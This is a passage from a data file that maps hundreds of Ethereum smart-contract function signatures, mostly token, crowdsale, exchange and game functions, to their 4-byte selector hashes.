"0x7aeaa864", "CrowdForceSampleToken()": "0x8cb47a2f", "getTokenTransferable()": "0x32a80329", "TheUltimateWorldDigitalCurrency()": "0x9e893d64", "CashBackToken()": "0x1173ca7d", "AlrzshTest()": "0x436393ab", "setNotaryAddress(address)": "0x8bc05609", "setNotaryParcel(uint256)": "0xd86ec25a", "updateConversionRate(uint256)": "0x87fcdbc1", "updateMinimumQuota(uint256)": "0xf93de2c3", "whitelistAddress(address,uint256)": "0x200c7295", "getWhitelistEntry(uint256)": "0xd2d92f24", "whitelistSize()": "0xf0a43714", "removeIntermediary(address)": "0x4d023404", "addIntermediary(address)": "0x4356f35b", "getIntermediary(uint256)": "0x4f011d9d", "intermediariesCount()": "0x48c0b782", "isIntermediary(address)": "0x692bf818", "_updateStats(uint256,uint256)": "0x7d7106ad", "_forwardFunds(address,uint256,uint256,uint256)": "0x083ccc8a", "_processFunds(uint256,uint256)": "0xc05a30b9", "checkMinimumQuota(address,uint256)": "0x930a0daa", "_buyTokens(address,address)": "0x21e53d77", "_transferToAddress(address,address,uint256,bytes)": "0x8e2ab359", "_transferInternal(address,address,uint256,bytes,string)": "0xa0b7dcb4", "_transferInternal(address,address,uint256,bytes)": "0x0af825da", "SanJaviercoinforwe()": "0x3ad389f2", "AdvancedEthVocToken(uint256,string,string)": "0x8d614474", "EthVocToken(uint256,string,string)": "0xa55545a9", "TTToken()": "0xa68dfb2d", "WartecToken()": "0x4c4f1386", "McCringleToken()": "0xf020bfe1", "GXDHRPToken()": "0xf904b9ff", "HAJDToken(string,uint8,string)": "0x00245220", "DoroDiamond()": "0x630d43cc", "XYZToken()": "0x263fa1ad", "AngelTestToken()": "0xce161b57", "getNumberByChoice(uint256)": "0x3bf5b9c0", "getPlayerBetInfo(address)": "0xecbee997", "saveResult(uint256)": "0x1e5890c4", "modifyChoice(uint256)": "0xc0916437", "ChampionSimple(uint256,uint256)": "0x91658639", "compromiseContract()": "0x21752974", "dividendBalance()": "0x3368a120", "collectsAccountDividends(address)": "0xdc64752d", "NieShichaoToken()": "0xd3554dd5", "Testita()": "0x413e31a8", "FeefersToken()": "0x059d92dc", "update_SRNT_price(uint256)": "0x3bc45598", "PolicyPalNetworkCrowdsale(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd36ef2cc", "eligibleAmountCheck(address,uint256)": "0x41d5f7ac", "eligibleAmount(address,uint256)": "0x416c3f16", "updateWhitelists(address[],bool[])": "0xa6d150e0", "updateWhitelist(address,bool)": "0x0d392cd9", "CrowdsaleAuthorizer(address,uint256,uint256,uint256,uint256,uint256)": "0xbc084de9", "ZyryanovKubSU2018()": "0x4b41eb4a", "HWGCToken()": "0x582a5c83", "MexicovsSweden()": "0x73a2d1ff", "Jakov()": "0x4b3544d5", "TicketToken()": "0x9f4f903e", "TSSECOND()": "0x9b782070", "setACLRole5999294130779334338(address)": "0xa28c644d", "setACLRole8972381298910001230(address)": "0x78044965", "setACLRole7123909213907581092(address)": "0x458284fb", "getACLRole7123909213907581092()": "0x00a626f6", "getACLRole8972381298910001230()": "0x892ef672", "getACLRole5999294130779334338()": "0x025313a2", "setAddress(bytes32,address,address)": "0x87932e0f", "readAddress(bytes32)": "0x9d84ae69", "setImplementation(address)": "0xd784d426", "setProxyOwner(address)": "0xcaaee91c", "ShopalToken()": "0xe1c9ccaa", "sellToken(address,uint256,uint256)": "0x3e11741f", "assignReservedTokens(address,uint8,uint256)": "0x4a3573f1", "icoAssignReservedBounty(address,uint256)": "0xce952345", "getTokenIssued()": "0x14f36e17", "getDeposit()": "0xc399ec88", "sellToken(uint256)": "0x2397e4d7", "getMinUnitPrice(uint8)": "0x6c610f53", "getPrice(uint8)": "0x37f1e7f2", "setPrices(uint256,uint256,string,string)": "0xc79a68cf", "setSellPrice(uint256,string)": "0x4289c781", "setBuyPrice(uint256,string)": "0x3578b7b3", "asserti(bool)": "0x997d2df8", "getVersions(address,bytes32,address,bytes32)": "0x9334ad0d", "getApplications(address,bytes32,address)": "0xd02f8b98", "versionAddresses(bytes32,bytes32,address)": "0xd42db190", "versionSelectors(bytes32,bytes32,address)": "0x551f3108", "versionIndex(bytes32,bytes32,address)": "0x78c7524d", "versionBase(bytes32,bytes32,address)": "0xd5666b5f", "appVersionList(bytes32,address)": "0xc0533b5d", "appBase(bytes32,address)": "0x56d26468", "registeredApps(address)": "0xa6c4cce9", "Arbiter(address)": "0x83c81bec", "multisend(address[],uint256[])": "0xaad41a41", "MultiSendToken()": "0x76429844", "Board(address)": "0x178407ca", "getDropNotices()": "0xa140e4ee", "getDropNotice()": "0x50613afe", "DropNotice(uint256,string,string,string)": "0x4eb95b97", "SITMock(address)": "0xc92babd1", "SampleERC677Token(address,uint256)": "0x9f7b967e", "updateNodeIPFSHash(bytes)": "0x30f1154f", "updateLink(address,bytes)": "0x8f477c55", "removeLink(address,bytes)": "0x1e3d9c04", "getNodeType(address)": "0xa69416f6", "getLinkHash(address)": "0x46e780b0", "getLinkOwner(address)": "0xcf26ac9b", "createSaleContract(address,uint256,uint256,bool)": "0xc5e412e5", "activate(bool)": "0xce5e84a3", "TokenSeller(address,uint256,uint256,bool)": "0x0781c111", "receiveVerification(uint256,uint256,uint256,bool)": "0x1e0976f3", "EmissiveToken(address,string,uint8,string,string)": "0xe34ad653", "premium(address,address)": "0x5e30c961", "orderExecutionBlockTime(bytes32)": "0xb0091773", "orderExecution(bytes32,uint256)": "0x8ef82010", "isValidMember(address)": "0x2b01bf51", "isExecutable(uint256)": "0x4e395e2a", "getDelegate(address,uint8)": "0x72ead941", "executeAddMemberProposal(uint256)": "0x6ac26d3d", "countVotes(uint256,uint256)": "0x1364326c", "countAllVotes(uint256)": "0x8f33df77", "addProposal(bytes32,uint256,bytes32)": "0xa4ce48c0", "askMembership()": "0xd664cd89", "setDelegate(uint8,address)": "0x3584fa38", "AbieFund(address[])": "0xc747ef76", "SNTPlaceHolder(address,address,address,address)": "0x6de343cd", "withdrawProfit()": "0x959499b6", "reCalc()": "0x0de9cacd", "getDepositDelta()": "0x8b3aa967", "getCumulativeProfit()": "0x8351a0d4", "getProfit()": "0x679dffb4", "SmartPonzi()": "0xe56646ae", "finishVotingTeam(uint256)": "0x6899dac5", "voteTeam(bool)": "0x2a711ab4", "votingInfoTeam()": "0x9b991d9b", "startVotingTeam(uint256)": "0x839ea3c4", "ProofTeamVote(address)": "0x51c72c87", "Setup()": "0x58793050", "queryN(uint256,string,bytes,uint256)": "0x80325b2d", "queryN(string,bytes)": "0x98cf6f22", "randomDS_updateSessionPubKeysHash(bytes32[])": "0x512c0b9c", "multiAddDSource(bytes32[],uint256[])": "0x6c0f7ee7", "setCBaddress(address,address,address)": "0x624bb8b3", "assertBalances()": "0xa0695f24", "finalizeFork()": "0xc3fc4787", "getWinningPayoutNumerator(uint256)": "0x3c264820", "getWinningPayoutDistributionHash()": "0x82100be6", "getMarketCreatorMailbox()": "0xed23378b", "getMarketCreatorSettlementFeeDivisor()": "0x1c7f3a96", "getShareToken(uint256)": "0x65957bf5", "getNumTicks()": "0xbad84c9e", "derivePayoutDistributionHash(uint256[],bool)": "0x2443f0ae", "ritual(uint256)": "0x03b8a24e", "redeemEther()": "0xe621b5df", "getHolderEditions(address)": "0x6531a708", "getTokenHolder(uint256)": "0xca55954c", "specificTransferFrom(address,address,uint256)": "0x65ce5222", "specificTransfer(address,uint256)": "0x350f4270", "returnChange(uint256)": "0x157daf2e", "issueNewSeries()": "0x11c7d6bd", "specificApprove(address,uint256)": "0x4ebab5cf", "Klein()": "0xb2cd67ef", "existsPriceOnAssetPair(address,address)": "0xe0fe42be", "getOrderPrice(address,address,uint256,uint256)": "0x0b5d94f6", "getReferencePrice(address,address)": "0xb84c743b", "getInvertedPrice(address)": "0x1d21f252", "getPrices(address[])": "0x8fb5a482", "getPrice(address)": "0x41976e09", "hasRecentPrices(address[])": "0x16c519ee", "hasRecentPrice(address)": "0xbea10370", "getLastUpdateId()": "0x1f4b8e41", "getValidity()": "0x3b7f7cfa", "getInterval()": "0x91ad27b4", "getQuoteAsset()": "0xcfba99dc", "getDecimals(address)": "0xcf54aaa0", "getSymbol(address)": "0xc9b2e522", "update(address[],uint256[])": "0x2c10e90c", "multiply13(uint256)": "0xcdbf9c42", "sendProposal(string)": "0x4546ad06", "votePreProposal(uint256)": "0x09a55b65", "createMember(address,address,bool,bool)": "0x435cebda", "setBureau(address,address,address)": "0x1b6b8656", "Dao1901()": "0x68efa030", "getMembersLength()": "0xfc53c821", "getMemberAdresse(uint256)": "0xfadda208", "getMemberRole(address)": "0x69639749", "getMemberCanVote(address)": "0x879b18b6", "getMemberPayed(address)": "0x7c987ba4", "getMemberSince(address)": "0xc1a2babc", "tipCreator()": "0xa14eaada", "getEbola()": "0x36d1535d", "MachineToken()": "0x7d7a9ca4", "incrementProgressOfAddressAndId(address,address,uint32)": "0xb5c5a635", "getProgressOfAddressAndId(address,address,uint32)": "0x7ee8703a", "randomSkinAppearance()": "0x21614f62", "setCommunityAddress(address,address)": "0x89b51f94", "setTeamTokenAddress(address,address)": "0x01ea6270", "doPresaleMinting(address,uint256,int256)": "0xc778a46b", "doCommunityMinting(address,uint256,int256)": "0xfd3cb5d1", "MintingContract()": "0x000b9726", "FineArtCoin()": "0x0866efcc", "MedCann()": "0x76dffa4e", "suicideSend(address)": "0x8460a9d9", "InternetWealth(uint256)": "0xbc9ff567", "freezeBalancesOf(address)": "0x65d48d0b", "freezeTimeOf(address)": "0xa176f6bc", "updateSecPerBlock(uint256)": "0xbeccdd91", "turnOffOraclize()": "0x2053e690", "turnOnOraclize()": "0x4b0c79aa", "transferFunds()": "0x3c68eb81", "updatePriceManualy(uint256)": "0x588666e2", "ETLTokenPresale(address)": "0x1e75c12d", "AltExtraHolderContract(address)": "0x14b0519d", "ExtraHolderContract(address,address[],uint256[])": "0xa17eb09f", "removeAmountForAddress(uint256,address,address)": "0x97b10976", "importAmountForAddress(uint256,address,address)": "0x5493a7f4", "createAmountFromTmedForAddress(uint256,address,address)": "0xf3983e44", "TimereumX()": "0x6e4602c8", "WEETtoken()": "0xc177e804", "donate(string)": "0xb5aebc80", "setDailySupply(uint256)": "0xe0cec919", "setBasicIncomeLimit(uint256)": "0x21e2933a", "setCooldownTime(uint256)": "0x6ff73201", "_createResident(string,string)": "0xdca67e5d", "joinGreatHarmon(string,string)": "0x2f4c0b08", "getResidentNumber()": "0xf390e4b4", "_isUnderLimit()": "0x31d4ed2e", "getBasicIncome()": "0x1c85ee51", "GreatHarmon()": "0x1a95bc99", "ecothereum()": "0x8139bc2f", "EtherSmart()": "0x8bb88db6", "depositToken(address,address,uint256)": "0xfb0f97a8", "MicroDex()": "0xf5b33d0a", "purchaseWolk(address)": "0x3d8c9b8c", "purchaseWolkEstimate(uint256,address)": "0x82712aeb", "sellWolkEstimate(uint256,address)": "0x9cf3123b", "estLiquidationCap()": "0x99dd1ed9", "updateExchangeStatus(bool)": "0x3bee0613", "setExchangeFormula(address)": "0x2659d8ef", "estProviderFee(address,uint256)": "0x8a5144c0", "estWolkToBurn(address,uint256)": "0xa8d18472", "checkFeeSchedule(address)": "0xff0935b1", "updateSettlementStatus(bool)": "0xc5b15057", "setFeeFormula(address)": "0xf7fca4f4", "setBurnFormula(address)": "0xf7dadf7d", "calculateProviderFee(uint256)": "0x3e81d56e", "calculateWolkToBurn(uint256)": "0x926f949e", "finalizeOpenSale()": "0x421521b1", "tokenGenerationEvent(address)": "0xfa6b129d", "participantBalance(address)": "0x826c69b8", "removeParticipant(address[])": "0xe814c941", "addParticipant(address[],uint256[])": "0x079ee6b3", "wolkGenesis(uint256,uint256,uint256,address,address)": "0xad7e01c8", "FuckFacebookCoin()": "0x100d7e30", "link(address,string)": "0xe4ef2cef", "sendLink(string,string,string)": "0xaf988341", "sendTest()": "0xf0d8d4af", "setXQU(string)": "0xf3d2f824", "getXQU()": "0xfb09c964", "makeXID(uint256)": "0x3ff9a877", "NP(uint256,string,string)": "0x26b4ce7f", "OHC_Crowdsale(uint256,uint256,uint256,address)": "0x55d17201", "GPPHARMTOKEN(uint256,uint256)": "0xbd5e3a80", "PTCToken()": "0xc78d846d", "nameChange(string,string)": "0xaf080014", "RewardsCoin()": "0x8c2081b5", "transferToken(address[],address,address,uint256)": "0x1311457c", "Main(address)": "0xc5c7681f", "NCRToken()": "0x4805b069", "ByteLockerShares()": "0xd5fb1a1c", "bitsmileToken()": "0x98f423b2", "releaseToken(uint256)": "0xb54d6238", "allocateNormalTimeMints(address,uint256,uint256,uint256,uint256)": "0x0a402742", "postAllocateAuctionTimeMints(address,uint256,uint256)": "0x96a80699", "addTeamTimeMints(address,uint256,uint256,bool)": "0x331c55b4", "refundFailedAuctionAmount()": "0xb19b2162", "fetchSuccessfulSaleProceed()": "0x2f83f781", "transferMintingAddress(address,address)": "0x48d24f35", "buyMintingAddress(uint256,uint256)": "0x5df34ff2", "getSellingStatus(uint256)": "0xc392f118", "getOnSaleIds()": "0xe0faf0a8", "cancelSaleOfMintingAddress()": "0x740707cf", "sellMintingAddress(uint256,uint256)": "0x3ed66d3d", "addContributor(uint256,address,uint256)": "0xe10289b8", "updateMyTimeMintBalance()": "0xc59513a4", "updateTimeMintBalance(uint256)": "0xa5f26760", "balanceById(uint256)": "0x4778dfb8", "updateBalanceOf(uint256)": "0x218e4562", "availableBalanceOf(uint256,uint256)": "0xe081fdfe", "getMintingPowerByAddress(address)": "0xb6033daf", "getMintingPowerById(uint256)": "0x335494a4", "setInitialMintingPowerOf(uint256)": "0xa028554e", "UpdateSellAgentSiteReg(address,address)": "0x63670e42", "UpdateSellAgent(address,address)": "0xef38d089", "Update_START_ICO_TIMESTAMP(uint256)": "0x194c8e15", "Update_START_PREICO_TIMESTAMP(uint256)": "0xf4d28ab0", "Update_START_PRESALE_TIMESTAMP(uint256)": "0xf2f48e20", "SetRate(uint32)": "0xd61e9274", "DOXToken()": "0x7c70c444", "SetVotingDescripion(string)": "0x706247a1", "callSomeFunctionViaInner3()": "0xbacd70b7", "callSomeFunctionViaInner2()": "0x69ed1b83", "TXToken(address)": "0x6cb0e9f0", "Buy(address,uint256)": "0xe3d4187f", "EmergencyStopSell(bool)": "0x5fbf79a2", "ProofOfPassiveDividends()": "0x586ac27d", "TimeBasedContract()": "0xcf1893de", "GricCoin()": "0x270fdd1a", "ElixirUSD()": "0xbc408ec4", "softSub(uint256,uint256)": "0x9bff209d", "fortnightsFromLast()": "0x1262d6be", "secToDays(uint256)": "0x228bff5a", "interest(uint256)": "0xe7b69e74", "calculateInterest(address,address)": "0x87092940", "payInterests()": "0xdccbb14b", "resetBatches(address,address)": "0xc8a4ddc3", "retrieve(uint256)": "0x8f88708b", "DinsteinCoin(uint256,uint256,uint256,string,string)": "0x7368b3cb", "CasinoCoin()": "0x1d7bb2db", "BeijingCoin()": "0x6d84dbb0", "Woleum()": "0x8b57192b", "ChangeTax(uint16)": "0x93275889", "_withdraw(address,uint256)": "0xb790a77b", "Buy(address)": "0x5c6c8903", "GetDividends(address,uint256)": "0x1dc55c2d", "ViewMyDivs(address)": "0xa2f6e5fb", "ViewMyTokens(address)": "0x09d0b12e", "GetSellOrderDetails(address)": "0x77f9c862", "GBP_Omnidollar()": "0x6485cc52", "EUAHTOKEN()": "0x9381ebfa", "NewYorkCoin()": "0xd4e30489", "BITDRIVE()": "0xc3c735cb", "AdsventureToken()": "0x854c584d", "MaximumcoinStart()": "0xb8b13e6b", "UnlockToken()": "0x70f18bcd", "ChangeSwapperAddress(address)": "0xb9119b87", "AUMXToken()": "0x6902a416", "AndiosCoin(uint256,string,uint8,string)": "0xba73737d", "sendErc20(address,address[],uint256[])": "0xaee25613", "sendEth(address[],uint256[])": "0x25245b26", "GetReferralDataOfAddress(address)": "0x561296e4", "GetReferredAt(uint256)": "0xe05b4c5f", "GetReferredCount()": "0xd1866019", "GetAllReferralAddresses()": "0xb5c90917", "BuyPresalePackage(uint8,address)": "0x326b0c7e", "AddNewPresalePackage(uint16,uint256)": "0xbd9d6b37", "SetActive(bool)": "0x739f2224", "RigCraftPresalePackageManager()": "0x10fc0a6e", "CreateToken(address,uint8,uint16)": "0x48f549a4", "GetTokenData(uint256)": "0x31ca4340", "setURIBase(string)": "0xbe7edebe", "SetPresaleHandler(address)": "0x93a45612", "BCMtest()": "0x459ebb8c", "EUSBToken()": "0x53a023d1", "LNDToken()": "0x5b1295d2", "AGToken()": "0x24da569a", "eLitecoin()": "0xd975767b", "GOGO()": "0x3ab81062", "stopTrading()": "0x7185f163", "HDAToken(uint256,string,string)": "0xa0c73e7c", "onlinenewsbalita()": "0xa4c0fd51", "MANHATTANPROXY9THCOLAVE()": "0x405f63e7", "mintMultiple(address[],uint256)": "0x648fb06f", "BETA()": "0x071a7541", "LabCoin(uint256)": "0x67da7b7a", "testDrip(address,address,uint256)": "0x17d5e4be", "CryptaurDepositoryTest()": "0xd98c08b5", "Quarkchain(uint256,uint256)": "0x47166f62", "YOU9COINToken(string,string,uint8,uint256)": "0x7ef1a396", "ETHERRED()": "0x654f7d40", "Vibranium()": "0x21dc04f4", "TOAB()": "0xe525af22", "withdrawLockedTokens()": "0x269cdaac", "Centaure()": "0xf326be05", "adjustPrice(uint256)": "0x72bf079e", "Blin()": "0xff4a7a7c", "OPSToken()": "0x239c02ba", "setInvestor(address)": "0x773041ce", "getNextBattleTime(uint64)": "0xf01de8c3", "getBattleCooldown(uint64)": "0xb969d399", "getBestAngel()": "0x2be9da97", "setBestAngel(uint32)": "0xad69644b", "Pets()": "0xf9ce733b", "disableICOSwapLock()": "0x1143c026", "mintICOTokens(address,uint256)": "0x24263f77", "ICOSwapRate()": "0x4474e057", "kickStartICO(address,uint256,int256)": "0x12bea6eb", "disableMiniSwapLock()": "0xbee36f37", "mintMiniICOTokens(address,uint256)": "0xf87f31c3", "preICOSwapRate()": "0x28ef42ce", "kickStartMiniICO(address)": "0x0ae80c37", "Consulteth(uint256,uint256)": "0xff507efa", "resistWhiteList(address)": "0x6513fafe", "setEnableWhiteList(bool)": "0x26ffa189", "PriIcoSale(address,uint256,uint256,address,address)": "0x2e63756f", "isRegistered(address,address)": "0xd3da927f", "transferSoldToken(address,address,uint256)": "0x23bb81ae", "AICoreCoin()": "0x0eb8d153", "DumbCoin()": "0x119d0cb5", "setLock(address,address,uint256,uint256)": "0xacdf7362", "activeBalanceOf(address)": "0x59f769a9", "setAdmin(address,address,bool)": "0xd2e9953a", "Insureum()": "0x037e2e91", "getClaim(string)": "0x2bb81546", "addNewClaim(string,uint256,uint256,string,string)": "0xb4b063df", "claimExist(string)": "0x86ca32b5", "getClaimKeysCount()": "0xe9a6cce4", "getClaimKeys()": "0x7d92bb6e", "LociBackend()": "0x23a8edb5", "POA20(string,string,uint8)": "0xde6b978d", "__concat(string[6])": "0x96ee03d6", "__char(bytes1)": "0xd94389bd", "__addressToString(address,address)": "0x60bc59b7", "claimOwnership(string,string,uint256,uint256)": "0x7692ba9a", "setIdentity(uint256,address,address,string)": "0xb0d26478", "getAppId(string)": "0xad0b38a2", "SCAM()": "0x727fc9fc", "SCAMERC20()": "0x0bb9f21e", "NEVA()": "0xc59b2e20", "getPotato()": "0x6e329aa9", "setPotato(string)": "0x7ed37b8d", "Propellerhead()": "0x357006c4", "ICOFFSHORE()": "0xbb7d4f65", "WebCoin()": "0x6ae8f49a", "setGenTime(uint256)": "0xccd8ad0c", "TeamLocker(address,address[],uint256[],uint256)": "0x0abbf2de", "use(address,address,uint256,uint256,uint256,uint256,uint256,string)": "0xc8e2fca0", "setFee(uint256,uint16,uint256)": "0x11a881e8", "setUseAddr(address)": "0xb280a96e", "use(address,uint256,uint256,uint256,uint256,uint256,string)": "0x2182ebbf", "COMMERCIALPOINTCHAINSYSTEM()": "0x18b437aa", "SIEToken(address,address)": "0xcf7956ab", "LOWIQ()": "0x2c2bc50b", "EBANK()": "0xa1d82cfd", "CCH_LLV_FIFA_2()": "0x8cfd6d4c", "resolveSupply(address)": "0x97d68c77", "sell(uint256,bool)": "0x010dbfec", "trickleUp()": "0xaee06324", "cashWallet(address)": "0x5ef78561", "fluxFeed(uint256,bool)": "0x6925ebb9", "fund(address,bool)": "0x2b435366", "edgePigmentB()": "0xc4387936", "edgePigmentG()": "0x8d26eb2b", "edgePigmentR()": "0x3f6c71c5", "sellBonds(uint256,bool)": "0xe16b924d", "holdingsOf_BEAR(address)": "0x8666fca5", "holdingsOf_BULL(address)": "0xbaf73c0f", "PeerLicensing()": "0xd7353371", "CBCC()": "0x9689e535", "getAmountBounus(uint256)": "0x5280b8ad", "getPeriodBounus()": "0x3876f81d", "ISE()": "0x007c197d", "increaseRound()": "0x4097d865", "checkAmount(uint256)": "0xdcd1e670", "PonziScheme(uint256)": "0x4299f706", "DevelCoin(uint256,string,uint8,string)": "0xb7d74fda", "setCurrentSaleDayAndBonus(uint8)": "0x3df4a282", "rebrand(string,string)": "0xa615237e", "changeStartDate(string)": "0x539af982", "SHITcoin()": "0xdb475044", "EvergreenHealthToken()": "0x8eb88c1b", "BIDCOIN()": "0xdf821cf7", "BitSelectConservador()": "0xa6658dea", "TestSale()": "0x23537880", "becomeOwner()": "0xf9dca989", "Alexa()": "0x02055186", "YBKToken(string,string,uint256,uint256,string)": "0xa1df7eb3", "UpgradeAgentEnabledToken(address)": "0x5d302ba1", "isFrozen(address,address)": "0x46de0fb1", "spread(address,address[],uint256[])": "0xb29e201c", "addit(uint256,uint256)": "0x08071c05", "subtr(uint256,uint256)": "0x13c25ba6", "NukTestToken()": "0xcd0ffdba", "manualPurchaseTokens(address,uint256)": "0x3c0cd36b", "migrateCrowdsale(address)": "0xfcc34e89", "finalizationCrowdsale()": "0x33a3d023", "finalizeCurrentStage()": "0x1d5fe710", "toggleVaultStateToAcive()": "0x8d9d851c", "PalliumCrowdsale(uint256,address)": "0xf1d3a853", "stageClose()": "0x1e893437", "StagedRefundVault(address)": "0xca699de1", "_getTokenRaised(uint256)": "0x6c9784b1", "computeTokensWithBonus(uint256)": "0x828375e8", "StagedCrowdsale()": "0x59c2af55", "AUFBToken()": "0x20ca292e", "GanaPreSale(address,address,address)": "0x8d3d8587", "VirusGame()": "0x288aa69b", "getOwnerVirusLength(address)": "0xfa7299f7", "getVirusLength()": "0x17356c22", "withdrawExcess(address)": "0xaffbf593", "infect(bytes32)": "0xb9ef7835", "mutate(bytes32,bytes32)": "0x6103dda6", "withdrawOwner()": "0xe8cc00ad", "withdrawPlayer()": "0x5b5c7705", "rollIt()": "0xa12e55d9", "gamble()": "0x86da69f0", "EnterRentCrowdsale()": "0x0d1017d6", "EnterRentToken()": "0x8fad8eec", "DTXToken(address)": "0x11428ce8", "IbkToken()": "0xd50e38c6", "parseNewOrder(uint224,uint8,uint256[],uint256)": "0x08d49d1f", "setFeeRebatePercent(address,uint8)": "0xd1a0e8c8", "setFeeRates(uint16,uint16,uint16)": "0x3c31fa62", "hardCancelOrder(uint224)": "0x5bad05bd", "setOrders(uint224,uint32,uint8,uint8,uint64,uint64,uint64)": "0x55ab314e", "calcFeeE8(uint64,uint256,address)": "0x6c265dc3", "getDealInfo(uint32,uint64,uint64,uint64)": "0xd9cea519", "initiateWithdraw(uint176,uint64)": "0x6cd51833", "confirmDeposit(uint64)": "0x39a2a7bd", "setExeStatus(uint64,uint64)": "0x107f3f6a", "setDeposits(uint64,address,uint16,uint64)": "0x62cf54c8", "setTokenInfo(uint16,string,address,uint64,uint256)": "0x53d142a7", "exeSequence(uint256,uint256[])": "0x722ded24", "transferFee(uint16,uint64,address)": "0xacfb208b", "withdrawToken(address,uint16)": "0x2f5e80c3", "withdrawEth(address)": "0x25e16063", "depositToken(address,uint16,uint256)": "0x624bd6c4", "depositEth(address)": "0xad9d4ba3", "setWithdrawAddr(address)": "0x7511ef65", "changeMarketStatus(uint8)": "0xb8f6e7ff", "Dex2(address)": "0xdf28d6fa", "IsMultiFreeze(address,address[])": "0xe797398f", "IsMultiFreeze(address,address[],bool)": "0x72bc56fe", "MultiTransfer(address,address[],uint256[])": "0x241a2305", "transferEther(uint256)": "0x73ffd5b7", "getAmountOfEtherSell(uint256)": "0x58306772", "getAmountOfLinkerBuy(uint256)": "0x27c8dae5", "getLpIsWorking(int256)": "0x2b99a087", "getLpAskPrice()": "0xdd7d6bb0", "getLpBidPrice()": "0xd69932a3", "setLpIsStart(bool)": "0x488b380b", "setLpFee(uint256)": "0x84dfbfe2", "setLPTargetPostion(uint256)": "0x5066a9ac", "setEdgePerPosition(uint256)": "0xf9268170", "setLpMaxVolume(uint256)": "0x4f3d1c27", "setPrices(uint256,uint256,uint256,uint256)": "0xd8e86854", "setBurnStart(bool)": "0xb777b11e", "FreezeAccount(address,bool)": "0xd16a7a4b", "IsFreezedAccount(address)": "0x282b5b19", "IHateEos(string)": "0x3694569e", "pigcoin(uint256,string,string)": "0x22c6aad9", "issueToken(uint256,uint256,uint256,uint256)": "0xff21f27f", "changePrice(uint256,uint256,uint256,uint256)": "0x153345ce", "withdrawAllFromRoot()": "0xc1dbbfb3", "judgeFakeTokenAndTransfer(uint256,address)": "0x6e88d5fa", "judgeFakeToken(uint256)": "0x4d02a8fb", "doesProofExist(bytes32)": "0x69b7215d", "notarizeHash(bytes32)": "0x1535884e", "CesaireToken()": "0xd3088b5f", "Houton()": "0xf87e7446", "issue(address[],uint256[])": "0xe971c252", "LDT()": "0x8017732d", "calculateCoinsPerWeiAndUpdateAvailableIcoCoins(uint256)": "0x3129be35", "sumOfAvailableIcoCoins()": "0x65f937ed", "grantCoins(address,uint256)": "0xee0a8011", "krypteum()": "0x95db03fe", "freeBeerOnMe(string)": "0x8f2a3093", "Marvin()": "0x33de61fb", "B24Token()": "0x5a2b31d9", "toogleTransfers()": "0x26a6dfed", "toogleMinting()": "0x56387fa3", "CCECOIN()": "0x9cb29034", "hasVaultAccess(address,address)": "0x006d96e0", "getFreelanceAgent(address)": "0x3411cb08", "getVaultAccess(address)": "0xfcf4b576", "setVaultDeposit(uint256)": "0x2529b907", "agentApproval(address,uint256)": "0x0b841433", "closeVaultAccess()": "0x6448b6cb", "createVaultAccess(uint256)": "0x7aca84a1", "getCurrentEthCapPerAddress()": "0x49dcd756", "setBaseCap(uint256)": "0x2ba00198", "ProgressiveIndividualCappedCrowdsale(uint256,uint256)": "0xbd84d8f6", "withdrawTalao(uint256)": "0x64e8687f", "SmartInvestmentFundToken(address)": "0x85e344f7", "BourseToken()": "0xbb6954ce", "GoDigit(uint256,string,string)": "0x46b61083", "YuanBaoCoin()": "0x6cdae459", "INTLToken()": "0x93940e0a", "continueRedeeming(uint256)": "0x5b290c1d", "startRedemption(uint256)": "0x38b0ea85", "windUp()": "0xe476137b", "withdrawBalanceMaxSteps(uint256)": "0x6d927db0", "continueDistribution(uint256)": "0x02f41314", "startDistribuion()": "0xd3c78097", "getHolding(address)": "0xeeb46634", "nextHolder(address)": "0x7e3d15ae", "firstHolder()": "0x1bf7628b", "getRedemptionRequest(uint256)": "0x3aa6f0ee", "nextRedemptionRequest(uint256)": "0x46238c69", "firstRedemptionRequest()": "0x00ccbc68", "cancelRedemptionRequest(uint256)": "0xc6c7d143", "requestRedemption(uint256)": "0xeeb3c910", "mintFromICO(address,uint256)": "0x3aa0396a", "TeddyChain()": "0x80df2cee", "mintAndLock(address,uint256,uint256)": "0x899e37b9", "SportXToken()": "0xbdf70de1", "Xerium()": "0x70133e4f", "redeemPreSale(address,address)": "0x541dc9ba", "redeemMany(address[])": "0xb8216ea8", "AuctusPreSaleDistribution()": "0xaa3f5087", "Imteaz()": "0xb973b286", "getEtherToBuy(uint256,uint256,bool)": "0x09130ba1", "setOverride(address)": "0x837e6a94", "setIdentityName(bytes32)": "0x7dea9118", "getIdentityInfo()": "0xa1945458", "nameOfIdentity()": "0xa45ee32c", "checkProof(bytes32)": "0x4d44f108", "removeProof(address,bytes32)": "0x72aa343a", "addProof(address,bytes32)": "0x08a2a386", "EthIdentity(bytes32)": "0x1b660f15", "getIdentityName()": "0x45934d0b", "OneUpToken(address)": "0x20c9f377", "SGNL()": "0x3d73ddfc", "Craftmelon()": "0x09236161", "SWEET(uint256,string,string)": "0x3d532ac5", "ContractRegistry()": "0x1985a440", "logCoinAgeRecord(address,address,uint256,bool)": "0xad534d9c", "transferAuditor(address)": "0x445b8477", "SetAuditedAssetSize(uint256)": "0x965bdf33", "PointToken(uint256,string,string,uint256)": "0xe47cb18f", "AOIS()": "0x58ae6242", "Travelerscoin()": "0xc8d942b5", "setWallets(address,address,address)": "0x75cb1bd1", "lockTournament(uint256,bool)": "0x00b5988e", "endTournament(uint256,uint256)": "0xcc93f66e", "knockoutTeam(uint256,uint256)": "0xab6a9f0e", "getUserWinInTournament(uint256)": "0x6bc8a260", "getUserSupportInTournament(uint256)": "0x2a74833d", "getTeamlistSupportInTournament(uint256)": "0x9ae51a1f", "_getUserSupportForTeamInTournament(uint256,uint256)": "0x3fb1ab52", "_getTeamSupportAmount(uint256,uint256)": "0xc86d0251", "_getTournamentSupportAmount(uint256)": "0x45387d2c", "supportTeam(uint256,uint256,uint256)": "0xc6bd541f", "createNewTourament(uint256[])": "0xa059ffa6", "modifyCommission(uint256,uint256)": "0x6db5d3b7", "ownerETHCashout(address)": "0xe28435c4", "pay(address,string)": "0xfb4da5b7", "paymentInfo(address,string)": "0xa0c99c51", "cancelPayment(string)": "0x84126e01", "requestPayment(uint256,uint256,string,address)": "0x4bf49313", "setPrevContract(address)": "0x251139f6", "CCH_ILOW_1()": "0xbd5b948d", "transferBonus(address,uint256)": "0xf9fb3c95", "RoseToken()": "0xcc342eba", "explore(uint256,uint256)": "0xbbb21c4d", "setOracleFee(uint256)": "0xb6d9ef60", 